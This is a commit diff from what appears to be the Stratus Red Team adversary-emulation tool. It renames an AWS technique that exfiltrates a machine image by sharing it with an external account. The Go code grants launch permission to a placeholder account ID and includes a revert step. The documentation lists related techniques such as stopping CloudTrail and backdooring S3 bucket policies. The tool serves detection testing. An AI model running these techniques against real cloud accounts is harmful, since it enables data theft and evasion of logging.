Rename attack technique for AMI exfiltration (public sharing to shari…

…ng with external account)

docs/attack-techniques/AWS/aws.exfiltration.ami-sharing.md

@@ -0,0 +1,24 @@
+# Exfiltrate an AMI by AMI Sharing
+
+Platform: AWS
+
+## MITRE ATT&CK Tactics
+
+
+- Exfiltration
+
+## Description
+
+
+Exfiltrates an AMI by sharing it with an external AWS account.
+
+Warm-up: Create an AMI.
+
+Detonation: Share the AMI.
+
+
+## Instructions
+
+```bash title="Detonate with Stratus Red Team"
+stratus detonate aws.exfiltration.ami-sharing
+```

docs/attack-techniques/AWS/index.md

@@ -25,7 +25,7 @@ Note that some Stratus attack techniques may correspond to more than a single AT
 
 ## Exfiltration
 
-- [Exfiltrate an AMI by Making it Public](./aws.exfiltration.ami-make-public.md)
+- [Exfiltrate an AMI by AMI Sharing](./aws.exfiltration.ami-sharing.md)
 
 - [Exfiltrate EBS Snapshot through snapshot sharing](./aws.exfiltration.ebs-snapshot-shared-with-external-account.md)
 

docs/attack-techniques/list.md

@@ -14,7 +14,7 @@ This page contains the list of all Stratus Attack Techniques.
 | [Stop a CloudTrail Trail](./AWS/aws.defense-evasion.stop-cloudtrail.md) | [AWS](./AWS/index.md) | Defense Evasion |
 | [Remove VPC flow logs](./AWS/aws.defense-evasion.remove-vpc-flow-logs.md) | [AWS](./AWS/index.md) | Defense Evasion |
 | [Execute discovery commands on an EC2 instance](./AWS/aws.discovery.basic-enumeration-from-ec2-instance.md) | [AWS](./AWS/index.md) | Discovery |
-| [Exfiltrate an AMI by Making it Public](./AWS/aws.exfiltration.ami-make-public.md) | [AWS](./AWS/index.md) | Exfiltration |
+| [Exfiltrate an AMI by AMI Sharing](./AWS/aws.exfiltration.ami-sharing.md) | [AWS](./AWS/index.md) | Exfiltration |
 | [Exfiltrate EBS Snapshot through snapshot sharing](./AWS/aws.exfiltration.ebs-snapshot-shared-with-external-account.md) | [AWS](./AWS/index.md) | Exfiltration |
 | [Backdoor an S3 Bucket via its Bucket Policy](./AWS/aws.exfiltration.backdoor-s3-bucket-policy.md) | [AWS](./AWS/index.md) | Exfiltration |
 | [Open Ingress Port 22 on a Security Group](./AWS/aws.exfiltration.open-port-22-ingress-on-security-group.md) | [AWS](./AWS/index.md) | Exfiltration |

internal/attacktechniques/aws/exfiltration/ami-make-public/main.go → internal/attacktechniques/aws/exfiltration/ami-sharing/main.go

@@ -18,14 +18,14 @@ var tf []byte
 
 func init() {
 	stratus.GetRegistry().RegisterAttackTechnique(&stratus.AttackTechnique{
-		ID:           "aws.exfiltration.ami-make-public",
-		FriendlyName: "Exfiltrate an AMI by Making it Public",
+		ID:           "aws.exfiltration.ami-sharing",
+		FriendlyName: "Exfiltrate an AMI by AMI Sharing",
 		Description: `
-Exfiltrates an AMI by sharing it publicly.
+Exfiltrates an AMI by sharing it with an external AWS account.
 
 Warm-up: Create an AMI.
 
-Detonation: Share the AMI publicly.
+Detonation: Share the AMI.
 `,
 		Platform:                   stratus.AWS,
 		MitreAttackTactics:         []mitreattack.Tactic{mitreattack.Exfiltration},
@@ -36,14 +36,14 @@ Detonation: Share the AMI publicly.
 }
 
 var amiPublicPermissions = []types.LaunchPermission{
-	{Group: types.PermissionGroupAll},
+	{UserId: aws.String("012345678901")},
 }
 
 func detonate(params map[string]string) error {
 	ec2Client := ec2.NewFromConfig(providers.AWS().GetConnection())
 	amiId := params["ami_id"]
 
-	log.Println("Exfiltrating AMI " + amiId + " by sharing it publicly")
+	log.Println("Exfiltrating AMI " + amiId + " by sharing it with an external AWS account")
 	_, err := ec2Client.ModifyImageAttribute(context.Background(), &ec2.ModifyImageAttributeInput{
 		ImageId: aws.String(amiId),
 		LaunchPermission: &types.LaunchPermissionModifications{
@@ -52,7 +52,7 @@ func detonate(params map[string]string) error {
 	})
 
 	if err != nil {
-		return errors.New("Unable to share AMI publicly: " + err.Error())
+		return errors.New("Unable to share AMI with external AWS account: " + err.Error())
 	}
 
 	return nil
@@ -62,7 +62,7 @@ func revert(params map[string]string) error {
 	ec2Client := ec2.NewFromConfig(providers.AWS().GetConnection())
 	amiId := params["ami_id"]
 
-	log.Println("Reverting exfiltration of AMI " + amiId + " by removing public sharing")
+	log.Println("Reverting exfiltration of AMI " + amiId + " by removing cross-account sharing")
 	_, err := ec2Client.ModifyImageAttribute(context.Background(), &ec2.ModifyImageAttributeInput{
 		ImageId: aws.String(amiId),
 		LaunchPermission: &types.LaunchPermissionModifications{
@@ -71,7 +71,7 @@ func revert(params map[string]string) error {
 	})
 
 	if err != nil {
-		return errors.New("Unable to remove AMI public permissions: " + err.Error())
+		return errors.New("Unable to remove AMI permissions: " + err.Error())
 	}
 
 	return nil

internal/attacktechniques/main.go

@@ -6,7 +6,7 @@ import (
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/defense-evasion/disable-cloudtrail"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/defense-evasion/remove-vpc-flow-logs"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/discovery/discovery-commands-ec2-instance-role"
-	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/ami-make-public"
+	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/ami-sharing"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/ebs-snapshot-share"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/s3-bucket-backdoor-bucket-policy"
 	_ "github.com/datadog/stratus-red-team/internal/attacktechniques/aws/exfiltration/securitygroup-open-port-22-to-internet"